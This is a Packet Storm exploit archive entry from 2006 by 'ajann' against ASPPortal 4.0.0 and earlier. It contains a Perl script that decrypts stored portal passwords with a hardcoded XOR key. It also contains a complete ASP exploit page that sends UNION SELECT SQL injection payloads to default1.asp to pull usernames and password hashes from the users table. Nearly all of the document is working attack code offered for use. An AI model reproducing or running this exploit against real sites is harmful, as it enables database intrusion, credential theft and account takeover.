ASPPortal-400.txt

2006-11-14T00:00:00
ID PACKETSTORM:52011
Type packetstorm
Reporter ajann
Modified 2006-11-14T00:00:00

Description

                                        
                                            `Perl Script Decode:  
  
#!/usr/bin/perl  
#AspPortal Password Decrypter  
#Get pass exploit.asp and this copy this window  
#Speical Thanks To::: Nukedx ,For ASPPORTAL Decrypter  
#ajann  
if(@1 = 1) { exploit(); }  
  
sub decrypt ()  
{  
$lp = length($appass);  
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";  
if ($lp == 0) { die("- An error occurued\r\n"); }  
for ($i = 0; $i < $lp ; $i++) {  
$f = $lp - $i - 1; # Formula for getting character via substr...  
$n = substr($apkey,$f,1);  
$l = substr($appass,$f,1);  
$appwd = chr(ord($n)^ord($l)).$appwd;  
}  
print "- Password decrypted as: $appwd\r\n";  
exit();  
}  
sub exploit ()   
{  
print "Password?: ";  
$kroo = <STDIN>;  
chop ($kroo);  
$appass = $kroo;  
$appass =~ s/(")/chr(34)/eg;  
$appass =~ s/(<)/chr(60)/eg;  
$appass =~ s/(>)/chr(62)/eg;  
$appass =~ s/( )/chr(32)/eg;  
decrypt();  
exit();   
}  
  
  
  
Exploit:  
  
  
<% Response.Buffer = True %>  
<% On Error Resume Next %>  
<% Server.ScriptTimeout = 100 %>  
  
<%  
  
'===============================================================================================  
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit  
'[Coded by : ajann  
'[Author : ajann  
'[Contact : :(  
'[ExploitName: exploit1.asp  
  
'[Note : exploit file name =>exploit1.asp  
'[Using : Write Target and ID after Submit Click  
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.  
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz  
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.  
'===============================================================================================  
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke  
  
%>  
  
<html>  
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>  
<head>  
  
<script language="JavaScript">   
function functionControl1(){   
setTimeout("functionControl2()",2000);   
}   
  
function functionControl2(){   
if(document.form1.field1.value==""){   
  
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");  
  
}   
}  
  
function writetext() {  
  
if(document.form1.field1.value==""){  
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'  
  
}  
}  
function write(){   
setTimeout("writetext()",1000);   
}   
  
</script>  
  
  
</head>  
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">  
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">  
  
<center>  
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal <=</b>v4.0.0(default1.asp) <u><b>  
Remote SQL Injection Exploit</b></u></a></font><br><br>  
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">  
<tr>  
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">  
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>  
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User   
ID=1]</b></font></td>  
<td width="50%"><center>  
<form method="post" name="form1" action="exploit1.asp?islem=get">  
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">  
<input type="submit" value="Get"></center></td>  
</tr>  
  
</table>  
  
<div id=htmlAlani></div>  
  
<%  
islem = Request.QueryString("islem")   
If islem = "hata1" Then   
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"  
End If  
If islem = "hata2" Then   
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"  
End If  
If islem = "hata3" Then   
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"  
End If  
%>  
  
<%   
  
If islem = "get" Then  
  
string1="default1.asp"  
string2="default1.asp"  
cek= Request.Form("id")  
  
  
targettext = Request.Form("text1")  
arama=InStr(1, targettext, "union" ,1)  
arama2=InStr(1, targettext, "http://" ,1)  
  
If targettext="" Then  
Response.Redirect("exploit1.asp?islem=hata1")  
  
Else  
If arama>0 then   
Response.Redirect("exploit1.asp?islem=hata2")  
  
Else  
If arama2=0 then   
Response.Redirect("exploit1.asp?islem=hata3")  
  
Else  
%>   
  
<%  
  
target1 = targettext+string1  
target2 = targettext+string2  
  
Public Function take(come)  
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )  
With objtake  
.Open "POST" , come, FALSE  
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"  
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek  
take = .Responsetext  
End With  
SET objtake = Nothing  
End Function  
  
Public Function take1(come1)  
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )  
With objtake1  
.Open "POST" , come1, FALSE  
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"  
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek  
take1 = .Responsetext  
End With  
SET objtake1 = Nothing  
End Function  
  
get_username = take(target1)  
get_password = take1(target2)  
  
getdata=InStr(get_username,"Poll Question:</b> " )  
username=Mid(get_username,getdata+24,14)  
passwd=Mid(get_password,getdata+24,14)  
  
%>  
<center>  
<font face="Verdana" size="2" color="#008000"> <u><b>  
ajann<br></b></u></font>  
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">  
<tr>  
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">              
<b><font size="2" face="Arial">User Name:</font></b></td>  
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>  
</tr>  
<tr>  
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">             
<b><font size="2" face="Arial"> User Password:</font></b></td>  
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>  
</tr>  
  
</table>  
  
<form method="POST" name="form2" action="#">   
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>   
</form>   
  
</center>  
  
<script language="JavaScript">  
write()  
functionControl1()  
</script>  
  
</body>  
</html>  
  
<%  
End If  
End If  
End If  
End If  
Set objtake = Nothing   
%>  
  
`